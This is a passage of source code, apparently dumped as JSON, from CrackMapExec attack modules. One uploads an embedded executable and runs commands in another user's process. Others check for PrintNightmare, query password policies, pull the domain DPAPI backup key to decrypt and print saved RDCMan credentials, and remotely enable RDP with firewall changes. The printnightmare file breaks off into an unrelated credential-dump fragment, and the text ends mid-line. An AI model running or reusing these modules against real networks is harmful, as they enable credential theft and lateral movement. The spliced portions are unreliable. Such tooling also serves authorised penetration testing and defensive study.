oeCh8KEAohCiIKIwokCiUKJgonCigKKQoqCisKLAotCi4KLwogCjEKMgozCjQKNQo2CjcKOAo5CjoKOwo8Cj0KPgo/CjAKQQpCCkMKRApFCkYKRwpICkkKSgpLCkwKTQpOCk8KQApRClIKUwpUClUKVgpXClgKWQpaClsKXApdCl4KXwpQCmEKYgpjCmQKZQpmCmcKaAppCmoKawpsCm0KbgpvCmAKcQpyCnMKdAp1CnYKdwp4CnkKegp7CnwKfQp+Cn8KcAqBCoIKgwqECoUKhgqHCogKiQqKCosKjAqNCo4KjwqACpEKkgqTCpQKlQqWCpcKmAqZCpoKmwqcCp0KngqfCpAKoQqiCqMKpAqlCqYKpwqoCqkKqgqrCqwKrQquCq8KoAqxCrIKswq0CrUKtgq3CrgKuQq6CrsKvAq9Cr4KvwqwCsEKwgrDCsQKxQrGCscKyArJCsoKywrMCs0KzgrPCsAK0QrQCwAwAcAAAAWK1wrXitAK4YriCuKK4wrjiuAAAAEAQAgAAAAHCheKGAoYihkKGYoaChqKGwobihyKHQodih4KHoofCh+KEAogiiGKIgokCioKLoogijKKNIo2ijmKOwo7ijwKP4owCksKa4psCmyKYgrDCsWKyArKis0KwArSitUK14raCtyK3wrSCuSK5wrrCuAK9Qr5ivwK/4rwAgBAAcAAAAKKBIoHigoKDIoPigMKFYoYChsKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==')\n \n if \"EXEC\" in module_options:\n self.cmd = module_options[\"EXEC\"]\n\n if \"PID\" in module_options:\n self.pid = module_options[\"PID\"]\n\n def on_admin_login(self, context, connection):\n\n if self.useembeded:\n file_to_upload = \"/tmp/pi.exe\"\n with open(file_to_upload, 'wb') as pm:\n pm.write(self.pi_embedded)\n else:\n if path.isfile(self.imp_exe):\n file_to_upload = self.imp_exe\n else:\n context.log.error(f\"Cannot open {self.imp_exe}\")\n exit(1)\n \n try:\n if self.cmd == \"\" or self.pid == \"\":\n self.uploadfile = False\n context.log.highlight(f\"Firstly run tasklist.exe /v to find process id for each user\")\n context.log.highlight(f\"Usage: -o PID=pid EXEC='Command'\")\n return\n else:\n self.uploadfile = True\n context.log.display(f\"Uploading {self.pi}\")\n with open(file_to_upload, 'rb') as pi:\n try:\n connection.conn.putFile(self.share, f\"{self.tmp_share}{self.pi}\", pi.read)\n context.log.success(f\"pi.exe successfully uploaded\")\n \n except Exception as e:\n context.log.fail(f\"Error writing file to share {self.tmp_share}: {e}\")\n return\n \n context.log.display(f\"Executing {self.cmd}\")\n command = f'{self.tmp_dir}pi.exe {self.pid} \\\"{self.cmd}\\\"'\n for line in connection.execute(command, True, methods=[\"smbexec\"]).splitlines():\n context.log.highlight(line)\n \n except Exception as e:\n context.log.fail(f\"Error running command: {e}\")\n finally:\n try:\n if self.uploadfile == True:\n connection.conn.deleteFile(self.share, f\"{self.tmp_share}{self.pi}\")\n context.log.success(f\"pi.exe successfully deleted\")\n except Exception as e:\n context.log.fail(f\"Error deleting pi.exe on {self.share}: {e}\")\n" }, { "path": "cme/modules/printnightmare.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.structure import Structure\nfrom impacket.dcerpc.v5 import transport, rprn\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRSTRUCT, NDRUNION, NULL\nfrom impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR\nfrom impacket.dcerpc.v5.rprn import checkNullString, STRING_HANDLE, PBYTE_ARRAY\n\nKNOWN_PROTOCOLS = {\n 135: {\"bindstr\": r\"ncacn_ip_tcp:%s[135]\"},\n 445: {\"bindstr\": r\"ncacn_np:%s[\\pipe\\epmapper]\"},\n}\n\n\nclass CMEModule:\n \"\"\"\n Check if vulnerable to printnightmare\n Module by @mpgn_x64 based on https://github.com/ly4k/PrintNightmare\n \"\"\"\n\n name = \"printnightmare\"\n description = \"Check if host vulnerable to printnightmare\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.__string_binding = None\n self.port = None\n\n def options(self, context, module_options):\n \"\"\"\n PORT Port to check (defaults to 445)\n \"\"\"\n self.port = 445\n if \"PORT\" in module_options:\n self.port = int(module_options[\"PORT\"])\n\n def on_login(self, context, connection):\n # Connect and bind to MS-RPRN (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/848b8334-134a-4d02-aea4-03b673d6c515)\n stringbinding = r\"ncacn_np:%s[\\PIPE\\spoolss]\" % connection.host\n\n context.log.info(\"Binding to %s\" % (repr(stringbinding)))\n\n rpctransport = transport.DCERPCTransportFactory(stringbinding)\n\n rpctransport.set_credentials(\n connection.username,\n connection.password,\n connection.domain,\n connection.lmhash,\n connection.nthash,\n connection.aesKey,\n )\n\n rpctransport.set_kerberos(connection.kerberos, kdcHost=connection.kdcHost)\n\n rpctransport.setRemoteHost(connection.host)\n rpctransport.set_dport(self.port)\n\n try:\n dce = rpctransport.get_dce_rpc()\n # Connect to spoolss named pipe\n dce.connect()\n # Bind to MSRPC MS-RPRN UUID: 12345678-1234-ABCD-EF00-0123456789AB\n dce.bind(rprn.MSRPC_UUID_RPRN)\n except Exception as e:\n context.log.fail(\"Failed to bind: %s\" % e)\n sys.exit(1)\n\n flags = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER\n\n driver_container = DRIVER_CONTAINER()\n driver_container[\"Level\"] = 2\n driver_container[\"DriverInfo\"][\"tag\"] = 2\n driver_container[\"DriverInfo\"][\"Level2\"][\"cVersion\"] = 0\n driver_container[\"DriverInfo\"][\"Level2\"][\"pName\"] = NULL\n driver_container[\"DriverInfo\"][\"Level2\"][\"pEnvironment\"] = NULL\n driver_container[\"DriverInfo\"][\"Level2\"][\"pDriverPath\"] = NULL\n driver_container[\"DriverInfo\"][\"Level2\"][\"pDataFile\"] = NULL\n driver_container[\"DriverInfo\"][\"Level2\"][\"pConfigFile\"] = NULL\n driver_container[\"DriverInfo\"][\"Level2\"][\"pConfigFile\"] = NULL\n\n try:\n hRpcAddPrinterDriverEx(\n dce,\n pName=NULL,\n pDriverContainer=driver_container,\n dwFileCopyFlags=flags,\n )\n except DCERPCSessionError as e:\n # RPC_E_ACCESS_DENIED is returned on patched systems, when\n # a non-administrative user tries to create a new printer\n # driver\n if e.error_code == RPC_E_ACCESS_DENIED:\n context.log.info(\"Not vulnerable :'(\")\n return False\n # If vulnerable, 'ERROR_INVALID_PARAMETER' will be returned\n if e.error_code == system_errors.ERROR_INVALID_PARAMETER:\n context.log.highlight(\"Vulnerable, next step https://github.com/ly4k/PrintNightmare\")\n return True\n raise e\n context.log.highlight(\"Vulnerable, next step https://github.com/ly4k/PrintNightmare\")\n return True\n\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__(self):\n key = self.error_code\n if key in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]\n return \"RPRN SessionError: code: 0x%x - %s - %s\" % (\n self.error_code,\n error_msg_short,\n error_msg_verbose,\n )\n else:\n return \"RPRN SessionError: unknown error code: 0x%x\" % self.error_code\n\n\n################################################################################\n# CONSTANTS\n################################################################################\n# MS-RPRN - 3.1.4.4.8\nAPD_COPY_ALL_FILES = 0x00000004\nAPD_COPY_FROM_DIRECTORY = 0x00000010\nAPD_INSTALL_WARNED_DRIVER = 0x00008000\n\n# MS-RPRN - 3.1.4.4.7\nDPD_DELETE_UNUSED_FILES = 0x00000001\n\n# https://docs.microsoft.com/en-us/windows/win32/com/com-error-codes-3\nRPC_E_ACCESS_DENIED = 0x8001011B\nsystem_errors.ERROR_MESSAGES[RPC_E_ACCESS_DENIED] = (\n \"RPC_E_ACCESS_DENIED\",\n \"Access is denied.\",\n)\n\n\n################################################################################\n# STRUCTURES\n################################################################################\n# MS-RPRN - 2.2.1.5.1\nclass DRIVER_INFO_1(NDRSTRUCT):\n structure = ((\"pName\", STRING_HANDLE),)\n\n\nclass PDRIVER_INFO_1(NDRPOINTER):\n referent = ((\"Data\", DRIVER_INFO_1),)\n\n\n# MS-RPRN - 2.2.1.5.2\nclass DRIVER_INFO_2(NDRSTRUCT):\n structure = (\n (\"cVersion\", DWORD),\n (\"pName\", LPWSTR),\n (\"pEnvironment\", LPWSTR),\n (\"pDriverPath\", LPWSTR),\n (\"pDataFile\", LPWSTR),\n (\"pConfigFile\", LPWSTR),\n )\n\n\nclass PDRIVER_INFO_2(NDRPOINTER):\n referent = ((\"Data\", DRIVER_INFO_2),)\n\n\nclass DRIVER_INFO_2_BLOB(Structure):\n structure = (\n (\"cVersion\", \" 0:\n add_user_bh(credz_bh, None, context.log, connection.config)\n except Exception as e:\n context.log.fail(\"Error openning dump file\", str(e))\n" }, { "path": "cme/modules/pso.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.ldap import ldap as ldap_impacket\nfrom math import fabs\nimport re\n\n\nclass CMEModule:\n '''\n Created by fplazar and wanetty\n Module by @gm_eduard and @ferranplaza \n Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py\n '''\n\n name = 'pso'\n description = \"Query to get PSO from LDAP\"\n supported_protocols = ['ldap']\n opsec_safe = True\n multiple_hosts = True\n \n pso_fields = [\n \"cn\",\n \"msDS-PasswordReversibleEncryptionEnabled\",\n \"msDS-PasswordSettingsPrecedence\",\n \"msDS-MinimumPasswordLength\",\n \"msDS-PasswordHistoryLength\",\n \"msDS-PasswordComplexityEnabled\",\n \"msDS-LockoutObservationWindow\",\n \"msDS-LockoutDuration\",\n \"msDS-LockoutThreshold\",\n \"msDS-MinimumPasswordAge\",\n \"msDS-MaximumPasswordAge\",\n \"msDS-PSOAppliesTo\",\n ]\n\n def options(self, context, module_options):\n '''\n No options available.\n '''\n pass\n \n def convert_time_field(self, field, value):\n time_fields = {\n \"msDS-LockoutObservationWindow\": (60, \"mins\"),\n \"msDS-MinimumPasswordAge\": (86400, \"days\"),\n \"msDS-MaximumPasswordAge\": (86400, \"days\"),\n \"msDS-LockoutDuration\": (60, \"mins\")\n }\n\n if field in time_fields.keys():\n value = f\"{int((fabs(float(value)) / (10000000 * time_fields[field][0])))} {time_fields[field][1]}\"\n \n return value\n \n def on_login(self, context, connection):\n '''Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection'''\n # Building the search filter\n searchFilter = \"(objectClass=msDS-PasswordSettings)\"\n\n try:\n context.log.debug('Search Filter=%s' % searchFilter)\n resp = connection.ldapConnection.search(searchFilter=searchFilter,\n attributes=self.pso_fields,\n sizeLimit=0)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n context.log.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n logging.debug(e)\n return False\n\n pso_list = []\n\n context.log.debug('Total of records returned %d' % len(resp))\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n\n pso_info = {}\n\n try:\n for attribute in item['attributes']:\n attr_name = str(attribute['type'])\n if attr_name in self.pso_fields:\n pso_info[attr_name] = attribute['vals'][0]._value.decode('utf-8')\n\n pso_list.append(pso_info)\n\n except Exception as e:\n context.log.debug(\"Exception:\", exc_info=True)\n context.log.debug('Skipping item, cannot process due to error %s' % str(e))\n pass\n if len(pso_list) > 0:\n context.log.success('Password Settings Objects (PSO) found:')\n for pso in pso_list:\n for field in self.pso_fields:\n if field in pso:\n value = self.convert_time_field(field, pso[field])\n context.log.highlight(u'{}: {}'.format(field, value))\n context.log.highlight('-----')\n\n else:\n context.log.info('No Password Settings Objects (PSO) found.')\n" }, { "path": "cme/modules/rdcman.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom dploot.triage.rdg import RDGTriage\nfrom dploot.triage.masterkeys import MasterkeysTriage, parse_masterkey_file\nfrom dploot.triage.backupkey import BackupkeyTriage\nfrom dploot.lib.target import Target\nfrom dploot.lib.smb import DPLootSMBConnection\n\nfrom cme.helpers.logger import highlight\n\n\nclass CMEModule:\n name = \"rdcman\"\n description = \"Remotely dump Remote Desktop Connection Manager (sysinternals) credentials\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n PVK Domain backup key file\n MKFILE File with masterkeys in form of {GUID}:SHA1\n \"\"\"\n self.pvkbytes = None\n self.masterkeys = None\n\n if \"PVK\" in module_options:\n self.pvkbytes = open(module_options[\"PVK\"], \"rb\").read()\n\n if \"MKFILE\" in module_options:\n self.masterkeys = parse_masterkey_file(module_options[\"MKFILE\"])\n self.pvkbytes = open(module_options[\"MKFILE\"], \"rb\").read()\n\n def on_admin_login(self, context, connection):\n host = connection.hostname + \".\" + connection.domain\n domain = connection.domain\n username = connection.username\n kerberos = connection.kerberos\n aesKey = connection.aesKey\n use_kcache = getattr(connection, \"use_kcache\", False)\n password = getattr(connection, \"password\", \"\")\n lmhash = getattr(connection, \"lmhash\", \"\")\n nthash = getattr(connection, \"nthash\", \"\")\n\n if self.pvkbytes is None:\n try:\n dc = Target.create(\n domain=domain,\n username=username,\n password=password,\n target=domain,\n lmhash=lmhash,\n nthash=nthash,\n do_kerberos=kerberos,\n aesKey=aesKey,\n no_pass=True,\n use_kcache=use_kcache,\n )\n\n dc_conn = DPLootSMBConnection(dc)\n dc_conn.connect()\n\n if dc_conn.is_admin:\n context.log.success(\"User is Domain Administrator, exporting domain backupkey...\")\n backupkey_triage = BackupkeyTriage(target=dc, conn=dc_conn)\n backupkey = backupkey_triage.triage_backupkey()\n self.pvkbytes = backupkey.backupkey_v2\n except Exception as e:\n context.log.debug(\"Could not get domain backupkey: {}\".format(e))\n pass\n\n target = Target.create(\n domain=domain,\n username=username,\n password=password,\n target=host,\n lmhash=lmhash,\n nthash=nthash,\n do_kerberos=kerberos,\n aesKey=aesKey,\n no_pass=True,\n use_kcache=use_kcache,\n )\n\n conn = None\n\n try:\n conn = DPLootSMBConnection(target)\n conn.smb_session = connection.conn\n except Exception as e:\n context.log.debug(\"Could not upgrade connection: {}\".format(e))\n return\n\n plaintexts = {username: password for _, _, username, password, _, _ in context.db.get_credentials(cred_type=\"plaintext\")}\n nthashes = {username: nt.split(\":\")[1] if \":\" in nt else nt for _, _, username, nt, _, _ in context.db.get_credentials(cred_type=\"hash\")}\n if password != \"\":\n plaintexts[username] = password\n if nthash != \"\":\n nthashes[username] = nthash\n\n if self.masterkeys is None:\n try:\n masterkeys_triage = MasterkeysTriage(\n target=target,\n conn=conn,\n pvkbytes=self.pvkbytes,\n passwords=plaintexts,\n nthashes=nthashes,\n )\n self.masterkeys = masterkeys_triage.triage_masterkeys()\n except Exception as e:\n context.log.debug(\"Could not get masterkeys: {}\".format(e))\n\n if len(self.masterkeys) == 0:\n context.log.fail(\"No masterkeys looted\")\n return\n\n context.log.success(\"Got {} decrypted masterkeys. Looting RDCMan secrets\".format(highlight(len(self.masterkeys))))\n\n try:\n triage = RDGTriage(target=target, conn=conn, masterkeys=self.masterkeys)\n rdcman_files, rdgfiles = triage.triage_rdcman()\n for rdcman_file in rdcman_files:\n if rdcman_file is None:\n continue\n for rdg_cred in rdcman_file.rdg_creds:\n if rdg_cred.type == \"cred\":\n context.log.highlight(\n \"[%s][%s] %s:%s\"\n % (\n rdcman_file.winuser,\n rdg_cred.profile_name,\n rdg_cred.username,\n rdg_cred.password.decode(\"latin-1\"),\n )\n )\n elif rdg_cred.type == \"logon\":\n context.log.highlight(\n \"[%s][%s] %s:%s\"\n % (\n rdcman_file.winuser,\n rdg_cred.profile_name,\n rdg_cred.username,\n rdg_cred.password.decode(\"latin-1\"),\n )\n )\n elif rdg_cred.type == \"server\":\n context.log.highlight(\n \"[%s][%s] %s - %s:%s\"\n % (\n rdcman_file.winuser,\n rdg_cred.profile_name,\n rdg_cred.server_name,\n rdg_cred.username,\n rdg_cred.password.decode(\"latin-1\"),\n )\n )\n for rdgfile in rdgfiles:\n if rdgfile is None:\n continue\n for rdg_cred in rdgfile.rdg_creds:\n if rdg_cred.type == \"cred\":\n context.log.highlight(\n \"[%s][%s] %s:%s\"\n % (\n rdgfile.winuser,\n rdg_cred.profile_name,\n rdg_cred.username,\n rdg_cred.password.decode(\"latin-1\"),\n )\n )\n elif rdg_cred.type == \"logon\":\n context.log.highlight(\n \"[%s][%s] %s:%s\"\n % (\n rdgfile.winuser,\n rdg_cred.profile_name,\n rdg_cred.username,\n rdg_cred.password.decode(\"latin-1\"),\n )\n )\n elif rdg_cred.type == \"server\":\n context.log.highlight(\n \"[%s][%s] %s - %s:%s\"\n % (\n rdgfile.winuser,\n rdg_cred.profile_name,\n rdg_cred.server_name,\n rdg_cred.username,\n rdg_cred.password.decode(\"latin-1\"),\n )\n )\n except Exception as e:\n context.log.debug(\"Could not loot RDCMan secrets: {}\".format(e))\n" }, { "path": "cme/modules/rdp.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\nfrom cme.connection import dcom_FirewallChecker\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples.secretsdump import RemoteOperations\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dcom import wmi\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY\n\n\nclass CMEModule:\n name = \"rdp\"\n description = \"Enables/Disables RDP\"\n supported_protocols = [\"smb\" ,\"wmi\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.action = None\n\n def options(self, context, module_options):\n \"\"\"\n ACTION Enable/Disable RDP (choices: enable, disable, enable-ram, disable-ram)\n METHOD wmi(ncacn_ip_tcp)/smb(ncacn_np) (choices: wmi, smb, default is wmi)\n OLD For old version system (under NT6, like: server 2003)\n DCOM-TIMEOUT Set the Dcom connection timeout for WMI method (Default is 10 seconds)\n cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}\n cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram}\n cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}\n \"\"\"\n if not \"ACTION\" in module_options:\n context.log.fail(\"ACTION option not specified!\")\n exit(1)\n\n if module_options[\"ACTION\"].lower() not in [\"enable\", \"disable\", \"enable-ram\", \"disable-ram\"]:\n context.log.fail(\"Invalid value for ACTION option!\")\n exit(1)\n\n self.action = module_options[\"ACTION\"].lower()\n \n if not \"METHOD\" in module_options:\n self.method = \"wmi\"\n else:\n self.method = module_options['METHOD'].lower()\n \n if context.protocol != \"smb\" and self.method == \"smb\":\n context.log.fail(f\"Protocol: {context.protocol} not support this method\")\n exit(1)\n\n if not \"DCOM-TIMEOUT\" in module_options:\n self.dcom_timeout = 10\n else:\n try:\n self.dcom_timeout = int(module_options['DCOM-TIMEOUT'])\n except:\n context.log.fail(\"Wrong DCOM timeout value!\")\n exit(1)\n \n if not \"OLD\" in module_options:\n self.oldSystem = False\n else:\n self.oldSystem = True\n\n def on_admin_login(self, context, connection):\n # Preparation for wmi protocol\n if self.method == \"smb\":\n context.log.info(\"Executing over SMB(ncacn_np)\")\n try:\n smb_rdp = rdp_SMB(context, connection)\n if \"ram\" in self.action:\n smb_rdp.rdp_RAMWrapper(self.action)\n else:\n smb_rdp.rdp_Wrapper(self.action)\n except Exception as e:\n context.log.fail(f\"Enable RDP via smb error: {str(e)}\")\n elif self.method == \"wmi\":\n context.log.info(\"Executing over WMI(ncacn_ip_tcp)\")\n\n wmi_rdp = rdp_WMI(context, connection, self.dcom_timeout)\n\n if hasattr(wmi_rdp, '_rdp_WMI__iWbemLevel1Login'):\n if \"ram\" in self.action:\n # Nt version under 6 not support RAM.\n try:\n wmi_rdp.rdp_RAMWrapper(self.action)\n except Exception as e:\n if \"WBEM_E_NOT_FOUND\" in str(e):\n context.log.fail(\"System version under NT6 not support restricted admin mode\")\n else:\n context.log.fail(str(e))\n pass\n else:\n try:\n wmi_rdp.rdp_Wrapper(self.action, self.oldSystem)\n except Exception as e:\n if \"WBEM_E_INVALID_NAMESPACE\" in str(e):\n context.log.fail('Looks like target system version is under NT6, please add \"OLD=true\" in module options.')\n else:\n context.log.fail(str(e))\n pass\n wmi_rdp._rdp_WMI__dcom.disconnect()\n\nclass rdp_SMB:\n def __init__(self, context, connection):\n self.context = context\n self.__smbconnection = connection.conn\n self.__execute = connection.execute\n self.logger = context.log\n\n def rdp_Wrapper(self, action):\n remoteOps = RemoteOperations(self.__smbconnection, False)\n remoteOps.enableRegistry()\n\n if remoteOps._RemoteOperations__rrp:\n ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\",\n )\n keyHandle = ans[\"phkResult\"]\n\n ans = rrp.hBaseRegSetValue(\n remoteOps._RemoteOperations__rrp,\n keyHandle,\n \"fDenyTSConnections\",\n rrp.REG_DWORD,\n 0 if action == \"enable\" else 1,\n )\n\n rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"fDenyTSConnections\")\n\n if int(data) == 0:\n self.logger.success(\"Enable RDP via SMB(ncacn_np) successfully\")\n elif int(data) == 1:\n self.logger.success(\"Disable RDP via SMB(ncacn_np) successfully\")\n \n self.firewall_CMD(action)\n\n if action == \"enable\":\n self.query_RDPPort(remoteOps, regHandle)\n try:\n remoteOps.finish()\n except:\n pass\n\n def rdp_RAMWrapper(self, action):\n remoteOps = RemoteOperations(self.__smbconnection, False)\n remoteOps.enableRegistry()\n\n if remoteOps._RemoteOperations__rrp:\n ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n \"System\\\\CurrentControlSet\\\\Control\\\\Lsa\",\n )\n keyHandle = ans[\"phkResult\"]\n\n rrp.hBaseRegSetValue(\n remoteOps._RemoteOperations__rrp,\n keyHandle,\n \"DisableRestrictedAdmin\",\n rrp.REG_DWORD,\n 0 if action == \"enable-ram\" else 1,\n )\n\n rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"DisableRestrictedAdmin\")\n\n if int(data) == 0:\n self.logger.success(\"Enable RDP Restricted Admin Mode via SMB(ncacn_np) succeed\")\n elif int(data) == 1:\n self.logger.success(\"Disable RDP Restricted Admin Mode via SMB(ncacn_np) succeed\")\n\n try:\n remoteOps.finish()\n except:\n pass\n\n def query_RDPPort(self, remoteOps, regHandle):\n if remoteOps:\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n \"SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\",\n )\n keyHandle = ans[\"phkResult\"]\n\n rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"PortNumber\")\n \n self.logger.success(f\"RDP Port: {str(data)}\")\n\n # https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/enable_rdp.rb\n def firewall_CMD(self, action):\n cmd = f\"netsh firewall set service type = remotedesktop mode = {action}\"\n self.logger.info(\"Configure firewall via execute command.\")\n output = self.__execute(cmd, True)\n if output:\n self.logger.success(f\"{action.capitalize()} RDP firewall rules via cmd succeed\")\n else:\n self.logger.fail(f\"{action.capitalize()} RDP firewall rules via cmd failed, maybe got detected by AV software.\")\n\nclass rdp_WMI:\n def __init__(self, context, connection, timeout):\n self.logger = context.log\n self.__currentprotocol = context.protocol\n # From dfscoerce.py\n self.__username=connection.username\n self.__password=connection.password\n self.__domain=connection.domain\n self.__lmhash=connection.lmhash\n self.__nthash=connection.nthash\n self.__target=connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain\n self.__doKerberos=connection.kerberos\n self.__kdcHost=connection.kdcHost\n self.__aesKey=connection.aesKey\n self.__timeout = timeout\n\n try:\n self.__dcom = DCOMConnection(\n self.__target,\n self.__username,\n self.__password,\n self.__domain,\n self.__lmhash,\n self.__nthash,\n self.__aesKey,\n oxidResolver=True,\n doKerberos=self.__doKerberos,\n kdcHost=self.__kdcHost,\n )\n\n iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)\n if self.__currentprotocol == \"smb\":\n flag, self.__stringBinding = dcom_FirewallChecker(iInterface, self.__timeout)\n if not flag or not self.__stringBinding:\n error_msg = f'RDP-WMI: Dcom initialization failed on connection with stringbinding: \"{self.__stringBinding}\", please increase the timeout with the module option \"DCOM-TIMEOUT=10\". If it\\'s still failing maybe something is blocking the RPC connection, please try to use \"-o\" with \"METHOD=smb\"'\n \n if not self.__stringBinding:\n error_msg = \"RDP-WMI: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again\"\n \n self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)\n # Make it force break function\n self.__dcom.disconnect()\n self.__iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)\n except Exception as e:\n self.logger.fail(f'Unexpected wmi error: {str(e)}, please try to use \"-o\" with \"METHOD=smb\"')\n if self.__iWbemLevel1Login in locals():\n self.__dcom.disconnect()\n\n def rdp_Wrapper(self, action, old=False):\n if old == False:\n # According to this document: https://learn.microsoft.com/en-us/windows/win32/termserv/win32-tslogonsetting\n # Authentication level must set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY when accessing namespace \"//./root/cimv2/TerminalServices\"\n iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)\n iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n self.__iWbemLevel1Login.RemRelease()\n iEnumWbemClassObject = iWbemServices.ExecQuery(\"SELECT * FROM Win32_TerminalServiceSetting\")\n iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]\n if action == 'enable':\n self.logger.info(\"Enabled RDP services and setting up firewall.\")\n iWbemClassObject.SetAllowTSConnections(1,1)\n elif action == 'disable':\n self.logger.info(\"Disabled RDP services and setting up firewall.\")\n iWbemClassObject.SetAllowTSConnections(0,0)\n else:\n iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)\n self.__iWbemLevel1Login.RemRelease()\n iEnumWbemClassObject = iWbemServices.ExecQuery(\"SELECT * FROM Win32_TerminalServiceSetting\")\n iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]\n if action == 'enable':\n self.logger.info(\"Enabling RDP services (old system not support setting up firewall)\")\n iWbemClassObject.SetAllowTSConnections(1)\n elif action == 'disable':\n self.logger.info(\"Disabling RDP services (old system not support setting up firewall)\")\n iWbemClassObject.SetAllowTSConnections(0)\n \n self.query_RDPResult(old)\n\n if action == 'enable':\n self.query_RDPPort()\n # Need to create new iWbemServices interface in order to flush results\n \n def query_RDPResult(self, old=False):\n if old == False:\n iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)\n iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n self.__iWbemLevel1Login.RemRelease()\n iEnumWbemClassObject = iWbemServices.ExecQuery(\"SELECT * FROM Win32_TerminalServiceSetting\")\n iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]\n result = dict(iWbemClassObject.getProperties())\n result = result['AllowTSConnections']['value']\n if result == 0:\n self.logger.success(\"Disable RDP via WMI(ncacn_ip_tcp) successfully\")\n else:\n self.logger.success(\"Enable RDP via WMI(ncacn_ip_tcp) successfully\")\n else:\n iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)\n self.__iWbemLevel1Login.RemRelease()\n iEnumWbemClassObject = iWbemServices.ExecQuery(\"SELECT * FROM Win32_TerminalServiceSetting\")\n iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]\n result = dict(iWbemClassObject.getProperties())\n result = result['AllowTSConnections']['value']\n if result == 0:\n self.logger.success(\"Disable RDP via WMI(ncacn_ip_tcp) successfully (old system)\")\n else:\n self.logger.success(\"Enable RDP via WMI(ncacn_ip_tcp) successfully (old system)\")\n\n def query_RDPPort(self):\n iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/DEFAULT', NULL, NULL)\n self.__iWbemLevel1Login.RemRelease()\n StdRegProv, resp = 